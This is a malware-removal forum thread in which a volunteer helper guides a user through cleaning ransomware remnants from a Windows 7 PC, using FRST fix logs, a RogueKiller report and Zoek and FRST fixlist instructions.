C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.txt => moved successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{483830EE-A4CD-4b71-B0A3-3D82E62A6909}" => key removed successfully
HKCR\CLSID\{483830EE-A4CD-4b71-B0A3-3D82E62A6909} => key not found.
HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@t.garena.com/garenatalk" => key removed successfully
C:\Users\KW\AppData\Roaming\Mozilla\Firefox\Profiles\kfpcf5c9.default\searchplugins\howto_recover_file_mbeso.html => moved successfully
C:\Users\KW\AppData\Roaming\Mozilla\Firefox\Profiles\kfpcf5c9.default\searchplugins\howto_recover_file_mbeso.txt => moved successfully
GalaxyClientService => service removed successfully
PinnacleUpdateSvc => service removed successfully
Secunia PSI Agent => service removed successfully
cleanhlp => service removed successfully
NvStUSB => service removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4811701C-FA0B-475F-BC94-B931A8442A1C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4811701C-FA0B-475F-BC94-B931A8442A1C}" => key removed successfully
C:\Windows\System32\Tasks\IJFXTJV => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\IJFXTJV" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4D6E08EF-71B0-4FE1-99B9-3F6B34438E95}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4D6E08EF-71B0-4FE1-99B9-3F6B34438E95}" => key removed successfully
C:\Windows\System32\Tasks\4343 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4343" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{62D75B3F-795C-40D3-83BE-45B8F4101BCF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{62D75B3F-795C-40D3-83BE-45B8F4101BCF}" => key removed successfully
C:\Windows\System32\Tasks\SXQHCMK => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SXQHCMK" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6E80BDEB-B02F-43C6-A0A3-7A7E287BB12B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6E80BDEB-B02F-43C6-A0A3-7A7E287BB12B}" => key removed successfully
C:\Windows\System32\Tasks\DZZPF => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DZZPF" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7009D75B-6D4C-4599-9BFF-9189E5E3A946}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7009D75B-6D4C-4599-9BFF-9189E5E3A946}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AdobeFlashPlayerUpdate" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{958954B3-7CA1-4897-9FBD-CDC081C1F5B6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{958954B3-7CA1-4897-9FBD-CDC081C1F5B6}" => key removed successfully
C:\Windows\System32\Tasks\FECWQT => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FECWQT" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A911910C-5B46-492B-8E9B-A5C37E9BE803}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A911910C-5B46-492B-8E9B-A5C37E9BE803}" => key removed successfully
C:\Windows\System32\Tasks\0 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\0" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{B8687491-B4A9-4E61-B701-C84380BEB419}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B8687491-B4A9-4E61-B701-C84380BEB419}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AdobeFlashPlayerUpdate 2" => key removed successfully
C:\Windows\Tasks\DZZPF.job => moved successfully
C:\Windows\Tasks\FECWQT.job => moved successfully
C:\Windows\Tasks\IJFXTJV.job => moved successfully
C:\Windows\Tasks\SXQHCMK.job => moved successfully
"C:\Windows\SysWOW64\zlib.dll" => ":DocumentSummaryInformation" ADS not found.
"C:\Windows\SysWOW64\zlib.dll" => ":SummaryInformation" ADS not found.
C:\Windows\SysWOW64\zlib.dll => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
C:\ProgramData\Microsoft => ":1JUrhqBxzVBn2oXHbF3idLRjdaK" ADS removed successfully.
C:\ProgramData\Microsoft => ":Bw0yU4h7WSa9zkLTBQbP" ADS removed successfully.
C:\ProgramData\Microsoft => ":er7Z6YcKSZpsAnbNiAs9nu4Y" ADS removed successfully.
"C:\Users\KW\Cookies" => ":8Cf9Q91WWNGZLUUlFb4AQuDRHLBm" ADS not found.
"C:\Users\KW\Cookies" => ":Ni6hbrdQGoIWWA8FzMivntYD" ADS not found.
"C:\Users\KW\Local Settings" => ":init" ADS not found.
C:\Users\KW\AppData\Local => ":init" ADS removed successfully.
"C:\Users\KW\AppData\Local\Application Data" => ":init" ADS not found.
"C:\Users\KW\AppData\Local\Temporary Internet Files" => ":puluywQBOvJITXRnmnlZvT" ADS not found.
"C:\Users\KW\AppData\Roaming\IJFXTJV.exe" => not found.
"C:\Users\KW\AppData\Local\Temp\launchie.vbs" => not found.
"C:\Users\KW\AppData\Roaming\SXQHCMK.exe" => not found.
"C:\Users\KW\AppData\Roaming\DZZPF.exe" => not found.
"C:\Users\KW\AppData\Roaming\FECWQT.exe" => not found.
C:\Windows\SysWOW64\C2MP => moved successfully
C:\Users\KW\AppData\Roaming\popry-a.exe => moved successfully
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk" => not found.
"C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.html" => not found.
"C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.txt" => not found.
C:\Users\KW\Documents\howto_recover_file_mbeso.html => moved successfully
C:\Users\KW\Documents\howto_recover_file_mbeso.txt => moved successfully
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\howto_recover_file_mbeso.html => moved successfully
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\howto_recover_file_mbeso.html => moved successfully
C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.html => moved successfully
C:\Users\KW\AppData\howto_recover_file_mbeso.html => moved successfully
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\howto_recover_file_mbeso.txt => moved successfully
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\howto_recover_file_mbeso.txt => moved successfully
C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.txt => moved successfully
C:\Users\KW\AppData\howto_recover_file_mbeso.txt => moved successfully
C:\Users\KW\AppData\LocalLow\howto_recover_file_mbeso.html => moved successfully
C:\Users\KW\AppData\LocalLow\howto_recover_file_mbeso.txt => moved successfully
C:\Users\KW\AppData\Local\howto_recover_file_mbeso.html => moved successfully
C:\Users\KW\AppData\Local\howto_recover_file_mbeso.txt => moved successfully
C:\Users\KW\AppData\Local\Apps\howto_recover_file_mbeso.html => moved successfully
C:\Users\KW\AppData\Local\Apps\howto_recover_file_mbeso.txt => moved successfully
C:\ProgramData\howto_recover_file_mbeso.html => moved successfully
C:\ProgramData\howto_recover_file_mbeso.txt => moved successfully
C:\Users\Public\Documents\howto_recover_file_mbeso.html => moved successfully
C:\Users\Public\Documents\howto_recover_file_mbeso.txt => moved successfully
"C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.html" => not found.
"C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.txt" => not found.
"C:\Users\KW\AppData\Local\howto_recover_file_mbeso.html" => not found.
"C:\Users\KW\AppData\Local\howto_recover_file_mbeso.txt" => not found.
"C:\ProgramData\howto_recover_file_mbeso.html" => not found.
C:\Users\KW\nsrulzde.exe => moved successfully
C:\Users\KW\AppData\Local\Temp\Quarantine.exe => Error: No automatic fix found for this entry.
C:\Users\KW\AppData\Local\Temp\sonarinst.exe => moved successfully
C:\Users\KW\AppData\Local\Temp\sqlite3.dll => moved successfully
EmptyTemp: => 26 GB temporary data Removed.

The system needed a reboot.

==== End of Fixlog 15:00:43 ====



#4 snapjaw

snapjaw
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  

Posted 12 November 2015 - 04:23 PM

Also there is a restore point now. The one FRST just created.

#5 nasdaq

nasdaq

  • Malware Response Team
  • 38,569 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:07:28 PM

Posted 13 November 2015 - 07:46 AM

It didn't really change anything.


Please tell me what are the remaining issues.

#6 snapjaw

snapjaw
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  

Posted 13 November 2015 - 01:23 PM

My computer is still slow. The text file telling me about how to recover the files still pops up at start up, as well as an internet browser with the same message.

Text and picture files are still encrypted; though i think new text files i create do not become encrypted now. Also I forgot to mention the pop up about volume shaders used to pop up every 5 seconds after i hit no. Now there is no more volume shader pop ups at all.

#7 snapjaw

snapjaw
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  

Posted 13 November 2015 - 01:28 PM

Also i just noticed in the task manager that physical memory is at 92%; way too high.

The big processes are msiexec.exe three conhost.exe processes. There are alot of conhost.exe processes that usually are not there.

And a few minutes after start up the physical memory drops to 50%. Still pretty high though.

Edited by snapjaw, 13 November 2015 - 02:12 PM.


#8 nasdaq

nasdaq

  • Malware Response Team
  • 38,569 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:07:28 PM

Posted 14 November 2015 - 09:45 AM

--RogueKiller--
  • Download & SAVE to your Desktop Download RogueKiller
  • Quit all programs that you may have started.
  • Please disconnect any USB or external drives from the computer before you run this scan!
  • For Vista or Windows 7, right-click and select "Run as Administrator to start"
  • For Windows XP, double-click to start.
  • Wait until Prescan has finished ...
  • When instructed Click on "Scan" button
  • Wait until the Status box shows "Scan Finished"
  • Click on "Report"
  • Click on Export TXT button save the file as RogueReport.txt
  • The file RogueReport.txt will be saved in the desktop.
  • Close the program.
  • Open the file with Notepad and Copy/paste the content into your next reply.
<<<>>>

You will need to temporarily disable your AV program so it does not interfere.
Info on how to disable your security applications How To Temporarily Disable Your Anti-virus, Firewall And Anti-malware Programs - Security Mini-Guides.

Download Zeok tool from here

When the download appears, save to the Desktop.
On the Desktop, right-click the Zoek.exe file and select: Run as Administrator
(Give it a few seconds to appear.)

Click the Options in bold the following options are available to you.
Select only the check boxes for the options in bold.
 

Running Processes
Installed Programs
Startup Information
FireFox look
Chrome Look
Auto Clean


Do a Quick Scan
HijackThis log
Uninstall list
Shortcut Fix
Do a Deep Scan
Installer List
IE Default
Silent Runner
System Restore Info
Symlink Check
Reset Chrome
System Specs
Recently created
Empty Temp
Auto Clean



Now...
Close any open Browsers.
Click the Run script button, and wait. It takes a few minutes to run all the script.

When the tool finishes, the zoek-results.log is opened in Notepad.
The log is also found on the systemdrive, normally C:\
If a reboot is needed, the log is opened after the reboot.
Do
Please attach the zoek-results.log in your reply. It's probably too long to post.

How to:
In the Reply section in the bottom of the topic Click the "more reply Options" button.
attachlogs.png

Attach the file.
Select the "Choose a File" navigate to the location of the File.
Click the file you wish to Attach.

Click the Add reply button.

Make sure you Enable your AV Program.
===

Any improvement?

#9 snapjaw

snapjaw
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  

Posted 14 November 2015 - 04:57 PM

Here is the rogue report.

 

RogueKiller V10.0.8.0 (x64) [Nov 20 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits

version
Started in : Normal mode
User : KW [Administrator]
Mode : Scan -- Date : 11/14/2015  15:33:07

¤¤¤ Processes : 1 ¤¤¤
[Suspicious.Path] igfxCUIService.exe -- C:\ProgramData

\igfxCUIService.exe[-] -> Killed [TermProc]

¤¤¤ Registry : 14 ¤¤¤
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1995585355-

2568222046-1999612799-1002\Software\Microsoft\Windows

\CurrentVersion\Run | igfxCUIService : "C:

\PROGRA~3\igfxCUIService.exe"  -> Found
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1995585355-

2568222046-1999612799-1002\Software\Microsoft\Windows

\CurrentVersion\Run | igfxCUIService : "C:

\PROGRA~3\igfxCUIService.exe"  -> Found
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System

\CurrentControlSet\Services\GalaxyCommunication ("C:

\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe")

-> Found
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System

\ControlSet001\Services\GalaxyCommunication ("C:\ProgramData

\GOG.com\Galaxy\redists\GalaxyCommunication.exe") -> Found
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System

\ControlSet002\Services\GalaxyCommunication ("C:\ProgramData

\GOG.com\Galaxy\redists\GalaxyCommunication.exe") -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-1995585355-

2568222046-1999612799-1002\Software\Microsoft\Internet

Explorer\Main | Start Page : www.google.com  -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-1995585355-

2568222046-1999612799-1002\Software\Microsoft\Internet

Explorer\Main | Start Page : www.google.com  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet

\Services\Tcpip\Parameters\Interfaces\{5722F3C1-0AE8-42B0-

B73C-1053D96A8EAE} | DhcpNameServer : 24.93.41.125

24.93.41.126 [UNITED STATES (US)][UNITED STATES (US)]  ->

Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System

\ControlSet001\Services\Tcpip\Parameters\Interfaces\{5722F3C1

-0AE8-42B0-B73C-1053D96A8EAE} | DhcpNameServer : 24.93.41.125

24.93.41.126 [UNITED STATES (US)][UNITED STATES (US)]  ->

Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System

\ControlSet002\Services\Tcpip\Parameters\Interfaces\{5722F3C1

-0AE8-42B0-B73C-1053D96A8EAE} | DhcpNameServer : 24.93.41.125

24.93.41.126 [UNITED STATES (US)][UNITED STATES (US)]  ->

Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software

\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons

\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 

-> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software

\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons

\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 

-> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software

\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons

\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 

-> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software

\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons

\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 

-> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 1 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 idnet.ua-

corp.com

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST500DM002-1BD142 ATA Device +++++
--- User ---
[MBR] 5916094c8afccd70600599efcac71d12
[BSP] ec01419df5922634e7dbad035685c8a9 : Windows Vista/7/8 MBR

Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 |

Size: 500 MB
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 1026048 |

Size: 476438 MB
User = LL1 ... OK
User = LL2 ... OK

============================================
RKreport_DEL_12052014_011604.log -

RKreport_SCN_12052014_011239.log



#10 snapjaw

snapjaw
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  

Posted 14 November 2015 - 05:13 PM

I am trying to run zoek now but it took like five minutes to open after i hit run as admin.

Edited by snapjaw, 14 November 2015 - 05:17 PM.


#11 snapjaw

snapjaw
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  

Posted 14 November 2015 - 06:44 PM

I've attached the zoek-results.txt file. The howto_recover text file still pops up at startup. And my computer seems to be working a little faster now but still not as fast as before the ransomware. My physical memory usage is at 40% right now.

Attached Files



#12 nasdaq

nasdaq

  • Malware Response Team
  • 38,569 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:07:28 PM

Posted 15 November 2015 - 08:53 AM

On the Desktop, right-click the Zoek.exe file and select: Run as Administrator
(Give it a few seconds to appear.)

Next, copy/paste the entire script inside the code box below to the input field of Zoek:
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_wkbap.html
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_wkbap.txt
undetermined - KW\AppData\Local\Google\Chrome\User Data\Default\Extensions\howto_recover_file_mbeso.html
undetermined - KW\AppData\Local\Google\Chrome\User Data\Default\Extensions\howto_recover_file_mbeso.txt
undetermined - KW\AppData\Local\Google\Chrome\User Data\Default\Extensions\howto_recover_file_wkbap.html
undetermined - KW\AppData\Local\Google\Chrome\User Data\Default\Extensions\howto_recover_file_wkbap.txt
HKLM\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} - http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7
HKLM\Wow6432Node\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} - http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7
HKCU\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} - http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7&rlz=1I7AURU_enUS501

Now...
Close any open Browsers.
Click the Run script button, and wait. It takes a few minutes to run all the script.

When the tool finishes, the zoek-results.log is opened in Notepad.
The log is also found on the systemdrive, normally C:\
If a reboot is needed, the log is opened after the reboot.

Please attach the zoek-results.log in your reply.

Also, please provide an update on how the computer is behaving after running the above script.

#13 snapjaw

snapjaw
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  

Posted 15 November 2015 - 03:48 PM

When I inputted the text and hit run script I got this popup.

 

"No input found, or input.txt is too small !!!

What would you like to do?

 

1-Do a Quick Scan and Automated Cleanup

2-Perform only a Quick Scan

3-Perform only a Deep Scan

4-Do a Deep Scan and Automated Cleanup"



#14 nasdaq

nasdaq

  • Malware Response Team
  • 38,569 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:07:28 PM

Posted 16 November 2015 - 09:05 AM

Forget about the Zoek fix.

Try this instead.

Press the windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.
Please copy the entire contents of the code box below to the a new file.
 
start

CloseProcesses:

C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_wkbap.html
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_wkbap.txt
C:\Users\KW\AppData\Local\Google\Chrome\User Data\Default\Extensions\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Local\Google\Chrome\User Data\Default\Extensions\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Local\Google\Chrome\User Data\Default\Extensions\howto_recover_file_wkbap.html
C:\Users\KW\AppData\Local\Google\Chrome\User Data\Default\Extensions\howto_recover_file_wkbap.txt

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Keep me posted.

#15 snapjaw

snapjaw
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  

Posted 16 November 2015 - 03:14 PM

Ok I ran FRST with the code you provided. There is no more ransom notepads or internet browsers opening at startup. I do still get a flash of some window at startup. I looked in slo-mo video and it looks like it says WNDA3100 Smart Wizard. I think this is from a wireless adapter I tried to install a few years back but I don't think it installed correctly. Now my computer started at 29% physical memory; here is a pic of the processes.
 
1zxm5b5.png
 
 
But went to 39% once I opened chrome to post this message.
 
 
2jagbvp.png
 
And here is a pic of my msconfig. You can see the WNDA3100 program there and also one called igfxcuiservice.  I don't know what that one is.
 
 
1r5blu.png
 
 
 
And come to think of it, I don't know if 40% physical memory is normal for my computer or not. Its been so long now that it could be my computers capacity or maybe longstanding malware has just made me accustomed to it. And I did used to have 4 gb of ram but one broke about 2 months ago while playing a game. Now i only have 2 gb.

Edited by snapjaw, 17 November 2015 - 01:49 AM.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users